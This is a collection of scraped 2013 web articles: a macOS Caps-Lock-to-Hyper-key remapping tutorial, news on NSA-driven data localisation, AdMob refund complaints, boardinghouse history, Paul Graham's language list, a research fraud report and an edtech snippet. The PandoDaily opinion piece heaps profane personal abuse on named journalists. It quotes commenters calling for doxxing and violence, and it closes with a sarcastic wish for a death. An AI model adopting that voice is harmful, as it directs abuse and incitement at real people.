The first thing you’ll need to do is disable the Caps Lock key in OS X. Head to System Preferences’ Keyboard pane and click the “Modifier Keys…” button. Set Caps Lock to “No Action.”

The system starts with PCKeyboardHack. I’ve used this on all of my machines, including Mountain Lion systems and have never had issues because of it. It installs a kernel extension, but I swear it’s nothing to be afraid of.

Once you install PCKeyboardHack, all you need to do is set your Caps Lock key to key code 80 (F19):

Next, I used KeyRemap4MacBook, another kext utility for more intensive remapping. If you’re new to KeyRemap4MacBook, you’ll have fun (and likely be overwhelmed) sifting through the default options. Explore, but be warned that enabling too many at once will guarantee that you forget which keys do what and lead to unexpected behavior. I know this from experience.

I’m adding my own custom commands to KeyRemap using the private.xml file. This file is easily located by opening KeyRemap4MacBook, going to the Misc. tab and clicking the button to “Open private.xml.”

Below is the code that I’m using for the primary remapping. It sets up the F19 key that the Caps Lock key is now remapped to so that pressing it once triggers escape (especially handy in vim) and holding it down simulates holding Control, Command, Option and Shift all at once. Rarely is this combination used as a hotkey combo, so it becomes a key that can be mapped to system-wide functions that are easily accessible without conflicting with anything else.

<?xml version="1.0"?>
<root>
  <item>
    <name>F19 to F19</name>
    <appendix>(F19 to Hyper (ctrl+shift+cmd+opt) + F19 Only, send escape)</appendix>
    <identifier>private.f192f19_escape</identifier>
    <autogen>
      --KeyOverlaidModifier--
      KeyCode::F19,
      KeyCode::COMMAND_L,
      ModifierFlag::OPTION_L | ModifierFlag::SHIFT_L | ModifierFlag::CONTROL_L,
      KeyCode::ESCAPE
    </autogen>
  </item>
</root>

Save the file and go back to KeyRemap4MacBook’s settings. Under the “Change Key” tab, hit the “ReloadXML” button on the right and your new options will show up at the top of the list (the screenshot shows some of my extra mappings, if your private.xml file is brand new you’ll only see the “F19 to F19” option). Enable “F19 to F19” and you’re good to go with a brand new Hyper key.

To make use of the Hyper key, you’ll want to start mapping it using your favorite keyboard utility. I’m doing most of my mapping in BetterTouchTool, but a tool like Keyboard Maestro offers even more options for sequential actions and other conditions.

Here are some basic settings I’m using to launch apps with the Hyper key. Hyper-M opens Mail, Hyper-B opens Chrome (browser), Hyper-T opens my iTerm2 visor, etc.

You can also modify your DefaultKeyBindings file to add editing commands triggered by the Hyper key when in Cocoa text fields, or special mappings in an app like iTerm2 to perform command-line text navigation. Sky’s pretty much the limit.

A New Twist in International Relations: The Corporate Keep-My-Data-Out-of-the-U.S. Clause - Bloomberg


Comments:"A New Twist in International Relations: The Corporate Keep-My-Data-Out-of-the-U.S. Clause - Bloomberg "

URL:http://www.bloomberg.com/news/2013-12-24/a-new-twist-in-international-relations-the-corporate-keep-my-data-out-of-the-u-s-clause.html


Photographer: Alex Wong/Getty Images. Medea Benjamin of CodePink protests as Director of the National Security Agency Gen. Keith Alexander waits for the beginning of a hearing before the House (Select) Intelligence Committee on Oct. 29, 2013 in Washington, DC.

By now, we've heard from tech companies such as Facebook, Google and Cisco Systems that the National Security Agency's spying poses a threat to their international business and, in Cisco's case, is already hurting it. So what does that threat look like, exactly, at ground level?

Some companies are apparently so concerned about the NSA snooping on their data that they're requiring - in writing - that their technology suppliers store their data outside the U.S.

In Canada, a pharmaceutical company and government agency have now both added language to that effect to their contracts with suppliers, as did a grocery chain in the U.K., according to J.J. Thompson, chief executive officer of Rook Consulting, an Indianapolis, Indiana-based security-consulting firm. He declined to name the companies, which are using Rook to manage the segmentation and keep the data out of the U.S.

Thompson said the language began appearing in contracts over the past couple weeks, and could be an early indicator of things to come as businesses adapt to a landscape altered by former NSA contractor Edward Snowden's leaks. Documents leaked by Snowden indicate that the NSA has tapped fiber-optic cables abroad, circumvented or cracked encryption and is massively collecting telephone records and Internet traffic. Facebook, Google, Apple and Yahoo were among 15 technology companies that asked President Barack Obama Dec. 17 to restrain the spy programs. Cisco said Nov. 13 that NSA spying has caused delays to networking equipment orders.

U.S.-based technology companies face a serious threat. The NSA disclosures may reduce U.S. technology sales overseas by as much as $180 billion, or 25 percent of information technology services, by 2016, according to Forrester Research Inc., a group in Cambridge, Massachusetts.

Some large tech firms have used the revelations as a public relations opportunity, casting themselves as defenders of individual privacy and a bulwark against government encroachment. The approach has elicited accusations of hypocrisy from privacy advocates who say that many tech companies are eroding privacy, as we reported Monday.

It's not all doom and gloom, however. Thompson's comments show that some U.S. firms stand to benefit from distrust of the U.S. government, and that a new model may be in the offing for protecting sensitive data from the NSA's prying eyes.

There's a worry in this approach, though. Keeping the data out of the U.S. makes intuitive sense, and limits the likelihood that U.S. firms bound by U.S. laws will disclose it to the government. However, if the scandal has proven nothing else, it's that the NSA isn't bound by geography. And bucking the childhood admonishment, it certainly doesn't do the polite thing and always ask permission first either.

Look Who’s Gawking: Inside Nick Denton’s phony, hypocritical class war against tech workers | PandoDaily


Comments:"Look Who’s Gawking: Inside Nick Denton’s phony, hypocritical class war against tech workers | PandoDaily"

URL:http://pando.com/2013/12/26/look-whos-gawking-inside-nick-dentons-phony-hypocritical-class-war-against-tech-workers/


By Paul Carr
On December 26, 2013

“There’s class warfare, all right, but it’s my class, the rich class, that’s making war, and we’re winning.” – Warren Buffett

“Hypocrisy is the only modern sin.” – Nick Denton

Last Friday morning, a shuttle bus transporting Google workers from Oakland to Mountain View was surrounded by a mob. A banner was unfurled – “Fuck off Google” — and several of the protesters began hurling rocks at the bus, smashing a side window. Later reports suggested the bus had its tires slashed before police arrived to break up the violence.

The attack coincided with a similar protest in San Francisco, which remained peaceful, although afterwards Erin Mcelroy of Eviction-Free San Francisco told Pando she was “excited” that her Oakland colleagues were “mobilizing in different ways.”

And so this is what it’s come to.

The technology industry in San Francisco continues to grow, and its highly paid workers continue to force up housing rents, pricing out local blue collar workers. Then there’s the Ellis Act which, critics say, makes it easier for landlords to force out long-time tenants with almost no oversight (defenders of the act argue that, in most cases, homeowners have to financially compensate evicted tenants). What’s not in doubt is that multi-billion-dollar companies like Twitter are being offered tax breaks to remain in San Francisco, while many regular folks can’t afford to stay even if they want to.

Setting aside the irony that, without those tax breaks, companies like Twitter had threatened to move out of San Francisco to nearby cities like Oakland, it’s not hard to understand why many workers in the Bay Area are angry at Larry Page, Sergey Brin, Marissa Mayer, Jack Dorsey and any of the other tech billionaires who have caused average one bedroom rents in San Francisco to rise close to $3000, and are likely to cause similar price hikes in Oakland.

And yet. Larry Page doesn’t take a shuttle bus to work, nor does Jack Dorsey. We can tell ourselves that the senior software engineer at Google earning $149,224 or the Facebook user operations analyst on $43,518 is infinitely more privileged than the BART driver taking home $155,308 or the station janitor who gets $82,752— and certainly most Googlers wouldn’t swap places with even their higher paid blue collar colleagues. But the fact remains that the people on that Google bus — the dozen or so junior employees and one terrified bus driver — played absolutely no part in creating the policies that have caused so much anger. One group of workers, scaring the shit out of another group of workers achieves almost nothing except turning public opinion against the protesters, like pissing in the lobby of a Bank of America succeeds only in ruining a janitor’s morning and giving the cops an excuse to sling you in jail.

Telling self-defeating protesters to stop making the same mistakes that self-defeating protesters have made for generations is not my game here — not least because I can’t imagine that anyone throwing a rock at a Google bus reads Pando, edited as it is by a free market monster, and staffed by such anti-labor zealots as… David Sirota and Mark Ames.

Also, the vast majority of the protesters seem sincere in their violent anger. Misguided, perhaps, but sincere. God knows it’s refreshing to see the blunt rage of a “Fuck Off Google” banner or the naked violence of a thrown rock in this maddeningly ironic, nod-and-a-snarky-wink world. Put a bird on this, you hipster fuck.

All of which makes it twice as disgusting to see a putrid, but highly visible subset of the technology press trying to co-opt the sincere anger of Bay Area workers and spin it into disingenuous, smug faux-classbaiting horseshit, for pageviews and cash bonuses.

CENTCOM for this fake-class-war-by-drone is Nick Denton’s Valleywag gossip blog which, despite its name, is safely situated in Manhattan, thousands of miles from the battlefront. Having regenerated more times than Doctor Who (but without the likable main character or crisp writing), the current incarnation of Valleywag has one clear mission: to grab hundreds of millions of monetizable clicks through an endless barrage of outraged posts about the entitled jerks who work in the technology industry.

This all-new Valleywag was conceived during the Occupy protests, when Gawker’s editors discovered that stories about a class war were just catnip for pageviews. And most of the Wall Streeters were mere millionaires— just imagine how much Gawker’s hipster readers would hate billionaires. Or billionaire nerds!

By the end of 2012, Occupy stories had all but fizzled out. So, in January of 2013, Denton announced — via Wall Street trade blog, Business Insider— the imminent return of Valleywag. The relaunched site came out swinging, with posts taking aim at the genuinely rich and powerful in Silicon Valley — skewering Marissa Mayer for buying her child an expensive playhouse and Sean Parker whose wedding was responsible for killing wildlife and protected trees in a Big Sur forest (never mind that it was later revealed that Mayer bought the house at an auction, for a $33,000 donation to a local charity which restores old homes for families in need, and that Parker didn’t, er, actually kill any wildlife or protected trees).

But something was off. Valleywag’s editor Sam Biddle was following his boss’ orders to the letter — but the stories weren’t sticking. No one was taking to the streets to demand Mayer’s or Parker’s head. It was as if Gawker readers didn’t care that Sheryl Sandberg once had a meeting with Jennifer Lawrence.

In fact, the usually infallible Denton had misjudged his audience. Specifically, he had forgotten the rule that we humans aren’t easily angered by those infinitely richer or more successful than us — the super wealthy have lives so remote from our own that we can’t muster genuine jealousy for something we could never have. No, what really drives us viscerally nuts are those who are just a bit wealthier, a fraction more successful. Those fuckers who are living the lives that we could be living, were we willing to lie just a little, or cheat just a little.

And so, Biddle was given new marching orders: go after the tech workers, not their bosses.

Today a Valleywag search for, let’s say, eBay founder Pierre Omidyar, garners precisely one result: a post which says almost nothing about the eBay founder’s wealth or what he’s spending it on. Contrast that with the eight results for the word “cafeteria,” reflecting Valleywag’s current obsession with the subsidized lunches supplied to “coddled” tech workers, or the 25 results for “asshole,” an epithet that Biddle has applied to a programmer who offered to teach a homeless man to code, and a seven year old child who washes cars for pocket money.

Writing at Slate, Farhad Manjoo explains the current rules of the Valleywag game:

“My primary beef with Valleywag is the way it spins the smallest bits of tech gossip or punditry into a larger, stereotypically skewed narrative about the tech industry. The narrative is generally about the amoral politics of techies or, as Biddle calls them, the “techno-libertarian goon squad.” In Valleywag’s worldview, every civic confrontation in Silicon Valley is a Manichean choice between the interests of techies and nontechies, and the techies are always cast as rich, tax-and-government-hating baddies who want to pull one over on the rest of us. Not only is this simplistic; often, it’s just wrong on the facts.”

Speaking of facts: While presenting itself as the champion of the working classes, the fact is Denton’s Gawker empire is guilty of almost every crime it accuses the tech industry of committing, and several it doesn’t. Denton, who now encourages others to sneer at Silicon Valley’s elite social clubs, made his own millions as co-founder of “First Tuesday,” an elite social club which spanned Europe during the first dot com boom. While crying foul at the off-shore tax dodging of San Francisco tech companies, Gawker Media is registered in the Cayman Islands to avoid paying US taxes, an arrangement which the New Yorker described as “like an international money-laundering operation.” As Valleywag howls that “Google interns earn more than you,” Gawker Media is currently the subject of a class action lawsuit over its earlier refusal to pay its own interns a dime for their labour. And how about Valleywag’s mockery of lavish Silicon Valley workplaces? Why not ask Denton about that when you visit his “steampunk” office, featuring “a lounge area that looks like it’s straight out of the blue pill/red pill scene in The Matrix,” an “office surfboard” and a rooftop party deck? Business Insider claims it’s one of the 15 coolest offices in tech. And while you’re there, make sure to also ask him about Gawker’s “Privilege Tournament,” a smug little contest in which Gawker readers were invited to vote on which “underprivileged” group (choices include: black, blind, transgender, people with AIDS, the homeless, “overeducated,” and fat…)  should “win” by virtue of its “sweet, sweet moral superiority” — or as Salon’s Katrina Richardson called the tournament: “a shamefully racist, sexist, homophobic and classist attempt to silence large swaths of people.”

Even Denton’s choice of Valleywag editor reeks of hypocrisy. Which is to say, if you’re going to wage a fake class war, then, Sam Faulkner Biddle is the perfect fake class warrior for the job. Long before he got his gig wailing about “spoiled brat” tech founders who owe their success to their fathers, Biddle gained entry to the prestigious Johns Hopkins university with no help whatsoever from his own father, the Pulitzer prize winning journalist — and Johns Hopkins lecturer — Wayne Biddle. In case the nepotism wasn’t obnoxious enough for his classmates, Biddle promptly joined the Delta Phi fraternity at which, Wikipedia tells us

“Controversy exists to a perceived exclusivity in the selection criteria. It is generally regarded that wealth is a factor as almost all members are from affluent backgrounds.”

One of Biddle’s former classmates put it in simpler terms: Delta Phi is a club you could only join if you have rich parents. After college, Biddle moved to New York where, fancying himself a novelist— (“I gingerly unpack the same three books I’ve been carrying along with me each day and lay them down at carefully calculated angles so that their titles will be visible to those at the table. Every afternoon I create this same still life, a diorama of the aspiring writer at work…”) — he wrote a series called “Diary of an Unemployed Class of ’10 Philosophy Major in New York City” for the Awl, including this revealing paragraph

“Is it petty to not share in the happiness of someone else’s success? Is it petty to wish-to beg, even, knuckles blistering, eyes bloodshot, beseeching each god-for their horrific downfall? Is it immature to consider another’s achievement, to imagine them doing the job you wish you had-walking around in your fancy pants, sleeping with your wife in your own bedroom, eating your Frosted Mini Wheats, loudly slurping the milk-and sink into despair? Is this unfair? Should this be beneath me?”

Naaaaaah.

Finally Biddle made it to Gawker Media, where, before finding his groove as the guy who calls out the tech industry’s obsession with expensive toys and its condescension towards minimum wage workers, he wrote about $2500 record turntables for Gizmodo and was recorded patronizing two “booth babes” while lip-syncing to “Niggaz in Paris” at grotesque industry junket, CES. (Disclosure: the only time I have ever met Biddle was at CES, at a lavish dinner hosted by a tech PR agency at Mario Batali’s Carne Vino steakhouse where a rib-eye steak costs $144— or thirteen times the San Francisco minimum wage, plus tax and gratuities.)

And so it came to pass that wealthy, privileged, Sam Biddle became Nick Denton’s pick to lead Gawker’s phony, hypocritical, long-distance class war against San Francisco’s wealthy, privileged tech workers. And why not? Per David Sirota’s recent exposé of Ed Schultz, Nick and Sam wouldn’t be the first journalists to deny their privileged background in order to make bank as born-again class warriors.

Today, Biddle spends his days searching the social media accounts of junior startup employees, looking for any Tweet, blog post or YouTube video that might fit his narrative of arrogant rich kids gone wild. And with an estimated 250,000 tech workers in the bay area alone, it’s easy for him to find one each day who is monstrously, entitledly struggling to transport a Christmas tree, or twelve techies packed into a “luxury” shared house, or a guy with a car that Biddle hopes will soon be vandalised. Or at least it should be easy.

One recent post was prompted by a Twitter employee commenting on the quality of restaurants surrounding the company’s Market Street office. To most readers, the Tweet was innocuous enough, but Biddle tortured and twisted it so disingenuously (into a narrative about how outsiders weren’t welcome at Twitter) that he was attacked in the comments by none other than former Valleywag editor Owen Thomas.

“You’re completely misreading the tweet,” wrote Thomas. “You may well still find the tweet obnoxious, but please evaluate it for its actual meaning, not some overworked misconstruing of it.” Biddle did not respond to his former colleague.

Even when Biddle is “right,” he can’t catch a break. Late last Friday afternoon, Valleywag “broke” yet another “story” — which is to say, posted yet another tweet — about a tech worker behaving badly. This time, the monster in question was IAC PR flack Justine Sacco who Tweeted to her 200 followers: “Going to Africa. Hope I don’t get AIDS. Just kidding. I’m white.” You likely know what happened next: the Tweet was picked up by BuzzFeed and Sacco was hounded across the globe like a modern day Dr Crippen, until the mob finally tracked her down in South Africa. But despite his success in having Sacco threatened with rape and murder, Biddle wasn’t satisfied…

“Can’t believe the entire internet is talking about something I found and my post only has 30k clicks smh,” he Tweeted.

At least the recent anti-gentrification protests have been traffic gold for Valleywag which gleefully posted a video from the first protest, apparently showing a Google worker yelling at protesters: “You can’t afford it? You can leave. I’m sorry, get a better job.” Lest his readers be forced to form their own opinion, Biddle helpfully categorized the post as “assholes.” That did the trick…

“If anyone is begging for some mob-style retribution it’s this piece of shit,” wrote one commenter.

“Who is this ass? Name, address, background, etc …. Someone please Dox this entitled jerk,” demanded another.

“It would have been better if someone would have hit him in the face,” said a third.

Of course that story too was promptly revealed as a hoax. The Google employee was actually a union organizer posing as a tech worker in a piece of “improv political theater.” Rather than apologizing for the error, Biddle simply struck through the first two lines of the post and added a four word update: “This was probably staged.” The rest of the post remained, as did the violent comments, alongside the growing number of responses demanding to know why Gawker didn’t delete the entire post.

The answer: Gawker writers are paid bonuses for attracting large numbers of unique visitors to the site, and its community platform — and the only thing that drives more responses than an accurate story is an inaccurate one. No wonder Biddle was “smh” at Buzzfeed stealing his traffic, and his cash reward, over the Sacco post.

Still, while Valleywag’s hypocrisy is certainly rank, for a while it wasn’t clear whether it was actually dangerous. Last week, though, we saw the first flash of violence in the bay area class war when a real bus, filled with real tech workers was hit by a real rock, showering real glass shards onto real flesh.

Even if we can’t blame Valleywag directly for the attack, the escalation might have been a good time for Biddle, were he to possess an ounce of human decency, to stop and think about whether his rhetoric might be contributing to a narrative in which ordinary tech workers, not their bosses, are the legitimate targets of violent protest.

But Biddle is not so much a normal human being as a grotesque hypocrite, employed by a huge, even more grotesquely hypocritical, media corporation. A corporation which thinks nothing of posting photographs of Trayvon Martin’s corpse on its front page and whose most senior editor believes media ethics to be “part of a process of trying to exclude the hoi polloi from the process of reporting.”

And so, despite being in possession of a metric ton more smug, entitled privilege than every man, woman and nerd on the Google bus, Sam Faulkner Biddle once again perched in his steampunk SoHo office and puked out another post mocking the members of the “coddled, gurgling startup scene” for their “pronounced horror” when an “anti-Google protest turns slightly violent.”

“There was a time when shocking people in positions of apparently unimpeachable power and influence to attain some political goal was considered “disruption,” but that was long, long ago,” Biddle wrote.

Yes, the “unimpeachable power” of an entry-level tech worker whose crime is paying inflated rent on an apartment in Oakland and whose just punishment is the “slight violence” of hurled rocks and broken glass.

Hopefully next time the mob will turn really violent and one of these tech assholes will actually be killed. Just think of the traffic surge when that happens, just think how great that Googler’s corpse will look on the front page of Gawker. You can be sure Nick Denton already is.

[Illustration by Hallie Bateman for Pandodaily]

Admob refunded all my payments!? - Page 3


Comments:" Admob refunded all my payments!? - Page 3"

URL:http://forums.makingmoneywithandroid.com/advertising-networks/4032-admob-refunded-all-my-payments-3.html


I cannot believe that they did this to so many customers over the Christmas period, I was left in DR on the 20th and missed automatic payments.

Google Admob were completely un-contactable for the whole Xmas period and Google Wallet (I called them 3 times for over 2 hrs) were nothing short of rude and completely useless.

How Admob had the ability to debit accounts more than credit accounts (even for a 24hr period) needs to be investigated.

What company decides to process refunds (globally) three days before Christmas??? Was there a smart reason that benefited Google for this timing that perhaps backfired on them?

If Admob had a call centre I could have contacted on the 22nd and got some answers from, all would be ok, but going through Christmas not having a clue what was happening has infuriated me, cost me time, money, missed payments and I still have no idea what refund I am due.

Let's be clear on this, Google did not email anyone with the exact amount of their refund due?

I look forward to my bank managing this from this point forward as I have done everything I can to contact AdMob, Google Wallet were useless and my bank has agreed to investigate the charges when I ask them on the 22nd.

I believe Google Admob will try and keep this issue very quiet but once all old Admob customers get back from holidays and realise what's been going on with their credit card, debit card and paypal accounts, expect an uproar from these customers.

Big Fail AdMob, suggest you get a helpline set up for Jan 2nd and allow us to access a person for once seeing as you have managed to pull off one of the biggest errors I have ever seen an ad network commit in the last 10 yrs.

Below is the latest update from Google.

Announcements

24 December 2013: Legacy AdMob refund FAQ
What happened?
We are in the process of shutting down the original legacy AdMob as we move to the new AdMob platform version. As a part of this process we are working to refund unused balances on the original platform.

Why do I see 'Google*AdMob' billing activity on my current credit card statement?
Between 19 and 20 December, Google issued refunds to your AdMob account for more than your unused account balance.

To correct this error, we will be reversing these incorrect refunds with corresponding transactions for the same amount.

There may be some accounts that have many instances of 'Google*AdMob.' We apologize for any inconvenience this may cause.

Is there anything I need to do?
No. We are working to correct errors and will be refunding the correct amount in January.

When will the correct refund arrive?
The correct refund will show up on your credit card statement in January or February depending on your account billing cycle.


Boardinghouses: where the city was born - Ideas - The Boston Globe


Comments:"Boardinghouses: where the city was born - Ideas - The Boston Globe"

URL:http://www.bostonglobe.com/ideas/2013/01/13/boardinghouses-where-city-was-born/Hpstvjt0kj52ZMpjUOM5RJ/story.html


Late in the 1860s novel “Little Women,” heroine Jo March, dreading her friend Laurie’s budding romantic feelings for her, tells her mother she feels “restless and anxious to be seeing, doing and learning more than I am.” Her solution is to move to the city, to live and work in a boardinghouse. There, she has a room to herself, time to write, and the welcome distraction of friendships with her fellow boarders.

Today the notion of the boardinghouse—a “big house full of strangers,” as Jo writes in a letter home, where a variety of people would rent rooms and eat at a common table—seems at best quaint, and at worst unsafe and unsavory, as 19th-century critics had it. In the grand narrative of American home life—farm, small town, suburb, apartment—the boardinghouse feels like a long-vanished footnote.

In places like Boston, however, they were anything but minor: They were a key part of how 19th-century cities grew, and left an imprint that survives even now. Whole neighborhoods teemed with them. Boardinghouses for black, Irish, Jewish, and immigrant Bostonians filled the lower slopes of Beacon Hill, while even genteel landladies on fashionable Beacon Street advertised “rooms with a private family.” As American cities turned into true modern metropolises in the 1830s, boarding became a way of life; social historians estimate that between a third and half of 19th-century urban residents were either boarders themselves, or took boarders into their homes. As Walt Whitman, who lived in boardinghouses from his early teens until after the Civil War, declared in 1842: “Married men and single men, old men and pretty girls; milliners and masons; cobblers, colonels, and counter-jumpers; tailors and teachers; lieutenants, loafers, ladies, lackbrains, and lawyers; printers and parsons—‘black spirits and white, blue spirits and gay’—all ‘go out to board.’ ”

By the 1930s, traditional boardinghouses dwindled, and cities today—filled with apartments, condos, and tightly packed houses—have all but forgotten their boardinghouse heritage. But boardinghouses are now being rediscovered by a handful of historians who make the case that the institution was crucial to shaping American cities and culture, and in doing so had a lasting influence on the way we live.

They also may offer some insights into where we’re going. As Americans flock back into cities, Boston and other urban centers are seeing the development of new and denser housing. Some “micro-apartment” developments echo boardinghouses closely, with small private quarters and common areas in which residents can eat and socialize together. That’s prompting some observers to wonder if something bigger might change as well. As America’s earlier romance with boardinghouses showed, the way we live together can actually change our culture in unanticipated ways.

***

Jo March’s journey in “Little Women,” though idealized, wasn’t an unrealistic one for a woman in the 19th century. After landing at the boardinghouse, Jo earns money caring for the landlady’s boisterous young children, embarks on “riotous” adventures on Saturdays, and enjoys observing her neighbors, including a large Irish family and a friendly German professor she goes on to marry.

In the 1830s and 1840s, American cities were expanding upward and outward. Young people and immigrants flocked there for work, but most couldn’t afford to live in single-family homes; those who could saw the influx of poorer workers and began to decamp to more stylish neighborhoods. In Boston, for example, as wealthy residents left the South End, the neighborhood’s elegant townhouses were converted into boardinghouses, a pattern replicated in many cities.

Adam Simpson for The Boston Globe

Today, the perpetual urban dilemma of how to live well in cramped, expensive neighborhoods is answered mostly by apartments, each effectively its own miniature house, complete with kitchen, bathroom, bedroom, and living room. In the 19th century, the answer was to share. A boardinghouse proprietor provided housekeeping services and three meals a day, usually eaten at a common table. Boardinghouses “served people who really [couldn’t] get a foothold in urban space any other way,” explained Betsy Klimasmith, an English professor at the University of Massachusetts Boston and author of a 2005 book about urban domesticity in American literature.

As such, boardinghouses were a kaleidoscopic reflection of urban America in all its variety. In an 1857 book, “The Physiology of New York Boarding-Houses,” re-issued by Rutgers University Press in 2008, an English humorist named Thomas Butler Gunn described houses for vegetarians, actors, and Bostonians, not to mention “the boarding-house where you’re expected to make love to the landlady.” Some houses catered to respectable middle-class families, while others welcomed rowdy single sailors. An 1869 guidebook to New York City described boardinghouses that ranged from $2.50 to $40 a week.

For a population accustomed to living with extended family, boardinghouses represented a first step toward the radical autonomy that we now take for granted in modern urban life. University of Rhode Island English professor David Faflik calls this a “national rite of passage,” as a population en masse split with the ties formed in towns and countryside. Rather than break completely with these ties, however, they re-created them, in a way that will be familiar to anyone who’s seen a roommate comedy like “Friends.” Historian Wendy Gamber cites one 1850s Boston woman who called her fellow boarders her “family,” joining them for holiday celebrations and excursions to church and public lectures—an intimacy not hard to imagine for single urban people today, but boldly independent for the time.

With new freedoms came new anxieties. Most boarders were men, but many boardinghouses were coed; proprietors were responsible for maintaining a moral atmosphere, with varied levels of success. Many respectable women sought out coed houses because all-female boardinghouses were considered likely to be brothels, though charitable organizations like the YWCA opened heavily supervised women’s boardinghouses as the century progressed.

Gamber, a historian at Indiana University Bloomington, wrote the first book dedicated to boardinghouses as a general phenomenon in 2007. In her accessible “The Boardinghouse in Nineteenth-Century America,” she argues that in a century obsessed with the idealized home, boardinghouses represented a potent contrast: “If homes were private, boardinghouses were public,” she writes. “If homes nurtured virtue, boardinghouses bred vice.” As one mid-19th-century New York critic sniffed, “It may be safely affirmed that there are not ten boarding houses in the city, which do not contain improper characters.”

Gamber also observes that boardinghouses seemed an affront to convention because landladies made money by performing domestic tasks—cooking, washing bed linens, and so on—that women were “supposed” to perform for love. Female residents, particularly married women, were also suspect, having handed over their “natural” domestic duties to another woman. One early 20th-century moralist warned that boarding wives were having abortions because it would be too inconvenient to have children in a boardinghouse; others simply fretted that boarding bred lazy wives.

The sense of threat is crystallized in an 1846 novel by Sarah Josepha Hale, influential editor of the popular Godey’s Lady’s Book. In the cautionary “Boarding Out,” Hale, herself a longtime boardinghouse resident, depicts a headstrong Boston wife who insists on moving her family from their own comfortable house to avoid becoming a “mere drudge.” The family auctions off its furniture and moves to a fashionable boardinghouse, where the mother grows vain and the father idle, and their young daughter Fanny takes ill and dies. The child’s last words are, “I want to go home.”

***

As histrionic as their warnings may sound today, 19th-century hand-wringers were right to worry that boardinghouses threatened the status quo. Boarding not only saved money and time, but to writers or others who craved exposure to a world beyond small towns, they provided an opportunity for social mixing, privacy, storytelling, and intimacy with strangers. Nathaniel Hawthorne, Herman Melville, Henry David Thoreau, Ralph Waldo Emerson, Emily Dickinson, and Edgar Allan Poe all lived occasionally as boarders.

A new book by David Faflik, “Boarding Out” (Northwestern University Press), argues that boardinghouses fundamentally reshaped the consciousness of the 19th century, particularly as seen through literature. Borrowing his title from Hale’s alarmist novel, he argues that the literary genre he calls “boardinghouse letters” is characterized by a sense of speed and scarcity he finds in works as varied as the ostensibly pastoral “Walden” and Nathaniel Hawthorne’s utopian novel “Blithedale Romance.” In many of these works, narrators alternate, story lines speed ahead and then cut off, and characters come and go in a style Faflik compares to a revolving door.

“Many of the works we would not associate with boardinghouses or even the city itself are very much based or founded on these changed ways of seeing the world that derive from boarding,” he said. “We wouldn’t have had an American Renaissance without cities, and we wouldn’t have had cities without boardinghouses.”

By the turn of the 20th century, boardinghouses were in decline, in favor of suburban homes, made practical by improving public transportation, and apartments, with their modern sheen of independence. Faflik calls antebellum boarding “a kind of adolescent stage for Americans as they adapted to a modern urban condition.” In the decades after the Civil War, people moved on to lodging houses, which lacked boarding’s shared meals and common spaces, as well as tenement houses, apartment hotels, and apartments as we recognize them today. “Boarders have simply ceased to be boarders,” a New York Times writer declared, somewhat prematurely, in 1878. “They have decided to live more wholesomely and satisfactorily.”

The boardinghouse spirit still survives, however. Cooperative housing, in which residents band together to maintain facilities (and respectability), carries echoes of it. Single-room occupancy buildings offer rooms with a shared kitchen. Halfway houses for recovering drug addicts and formerly homeless people often offer boardinghouse-style independent quarters and shared meals. The YMCA, whose American iteration was founded in Boston to provide boarding services to “young strangers” new to the city, and the YWCA live on, providing transitional housing and meals to the needy. College students living in dormitories and eating together in a cafeteria get a taste of the social spark boardinghouses offered; for travelers, bed and breakfasts offer a genteel, temporary version.

Some newer innovations, too, are capturing boardinghouses’ allure, offering a way to save money, escape the constraints of home, and find something like a family in the middle of a city.
Micro-apartments, extra-tiny private spaces with shared kitchens down the hall, are taking off in cities including Boston, New York, and Seattle. The website Airbnb connects people with extra space to strangers who need a place to stay. In this innovative moment, it’s not hard to imagine a 21st-century revival of more traditional boardinghouses, too. “While boarders’ complaints were numerous, they often formed long-lasting bonds with their housemates,” Gamber wrote in an e-mail. “I’m not sure how practical or affordable running a boardinghouse or living as a boarder would be...but I suspect that enterprising entrepreneurs would find a ready market.”

One variation has seen young Americans boarding with the most patient landlords of all: their parents. The recent recession pushed a quarter of American young adult “boomerang kids” back into living at home. As the economy slowly recovers, however, independent young workers are beginning to move back out on their own, bringing with them all the demands that made 19th-century boardinghouses so practical. Today’s Jo March may be sleeping in her parents’ basement, dreaming of a room for herself in the city.

What Languages Fix


Comments:"What Languages Fix"

URL:http://paulgraham.com/fix.html


Kevin Kelleher suggested an interesting way to compare programming languages: to describe each in terms of the problem it fixes. The surprising thing is how many, and how well, languages can be described this way.

Algol: Assembly language is too low-level.

Pascal: Algol doesn't have enough data types.

Modula: Pascal is too wimpy for systems programming.

Simula: Algol isn't good enough at simulations.

Smalltalk: Not everything in Simula is an object.

Fortran: Assembly language is too low-level.

Cobol: Fortran is scary.

PL/1: Fortran doesn't have enough data types.

Ada: Every existing language is missing something.

Basic: Fortran is scary.

APL: Fortran isn't good enough at manipulating arrays.

J: APL requires its own character set.

C: Assembly language is too low-level.

C++: C is too low-level.

Java: C++ is a kludge. And Microsoft is going to crush us.

C#: Java is controlled by Sun.

Lisp: Turing Machines are an awkward way to describe computation.

Scheme: MacLisp is a kludge.

T: Scheme has no libraries.

Common Lisp: There are too many dialects of Lisp.

Dylan: Scheme has no libraries, and Lisp syntax is scary.

Perl: Shell scripts/awk/sed are not enough like programming languages.

Python: Perl is a kludge.

Ruby: Perl is a kludge, and Lisp syntax is scary.

Prolog: Programming is not enough like logic.

Professor admits faking AIDS vaccine to get $19M in grants | New York Post


Comments:"Professor admits faking AIDS vaccine to get $19M in grants | New York Post"

URL:http://nypost.com/2013/12/26/professor-admits-faking-aids-vaccine-to-get-19m-in-grants/


An Iowa State University professor resigned after admitting he falsely claimed rabbit blood could be turned into a vaccine for the AIDS virus.

Dr. Dong-Pyou Han spiked a clinical test sample with healthy human blood to make it appear that the rabbit serum produced disease-fighting antibodies, officials said.

The bogus findings helped Han’s team obtain $19 million in research grants from the National Institutes of Health, said James Bradac, who oversees the institutes’ AIDS research.

The remarkable findings were reported in scientific journals but raised suspicions when other researchers could not duplicate Han’s results.

The NIH uncovered the scam when it checked the rabbit serum at a lab and found the human antibodies.

Han resigned from his university post as an assistant professor of biomedical studies in October. His case came to light this week when it was reported in the Federal Register.

Han agreed last month not to seek government contracts for three years, the register said.

Chicago Makes Computer Science a Core Subject | EdTech Magazine


Comments:"Chicago Makes Computer Science a Core Subject | EdTech Magazine"

URL:http://www.edtechmagazine.com/k12/article/2013/12/chicago-makes-computer-science-core-subject


For so long, K–12 education has focused on the basic humanities and sciences. That usually meant that core subjects were English, history, math and a laboratory science of some kind. Computer science, if it was offered, was usually an elective class in middle or high school, often focused on acclimating kids to using software rather than creating their own.

